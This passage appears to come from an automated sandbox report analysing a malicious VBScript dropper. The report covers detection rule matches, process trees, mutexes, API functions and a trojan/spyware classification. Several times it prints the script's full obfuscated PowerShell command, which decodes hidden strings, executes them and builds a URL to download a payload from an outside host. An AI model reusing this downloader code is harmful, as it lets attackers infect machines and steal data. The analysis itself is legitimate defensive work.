              Source: Yara matchFile source: 00000007.00000002.3434646364.000000000843B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3434646364.0000000008465000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3136, type: MEMORYSTR

              System Summary

              barindex
              Source: amsi32_6592.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1076, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file: Call Rafledes.ShellExecute( "p" + lapsers,Granitalter & Bespelled & Granitalter ,"","",0)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004016FD NtdllDefWindowProc_A,10_2_004016FD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004017B7 NtdllDefWindowProc_A,10_2_004017B7
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4AB162_2_00007FF848C4AB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C4B8C22_2_00007FF848C4B8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848C452522_2_00007FF848C45252
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D19B6A2_2_00007FF848D19B6A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0495E9284_2_0495E928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0495F1F84_2_0495F1F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0495E5E04_2_0495E5E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_049535ED4_2_049535ED
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A971947_2_02A97194
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A8B5C17_2_02A8B5C1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040503810_2_00405038
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041208C10_2_0041208C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004050A910_2_004050A9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040511A10_2_0040511A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043C13A10_2_0043C13A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004051AB10_2_004051AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044930010_2_00449300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040D32210_2_0040D322
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A4F010_2_0044A4F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043A5AB10_2_0043A5AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041363110_2_00413631
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044669010_2_00446690
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A73010_2_0044A730
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004398D810_2_004398D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004498E010_2_004498E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044A88610_2_0044A886
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0043DA0910_2_0043DA09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00438D5E10_2_00438D5E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00449ED010_2_00449ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041FE8310_2_0041FE83
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00430F5410_2_00430F54
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004050C211_2_004050C2
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004014AB11_2_004014AB
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040513311_2_00405133
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004051A411_2_004051A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040124611_2_00401246
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040CA4611_2_0040CA46
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040523511_2_00405235
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004032C811_2_004032C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0040168911_2_00401689
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00402F6011_2_00402F60
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
              Source: heteronymous.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5971
              Source: unknownProcess created: Commandline size = 5971
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5971Jump to behavior
              Source: amsi32_6592.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1076, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@14/10@2/3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,9_2_004182CE
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,11_2_00410DE1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,9_2_00418758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,9_2_004148B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Mikadoerne124.StyJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-D98D6X
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wcxb23n.aup.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs"
              Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1076
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6592
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000007.00000002.3447223963.00000000243C0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: heteronymous.vbsVirustotal: Detection: 9%
              Source: heteronymous.vbsReversingLabs: Detection: 23%
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-33236
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\heteronymous.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 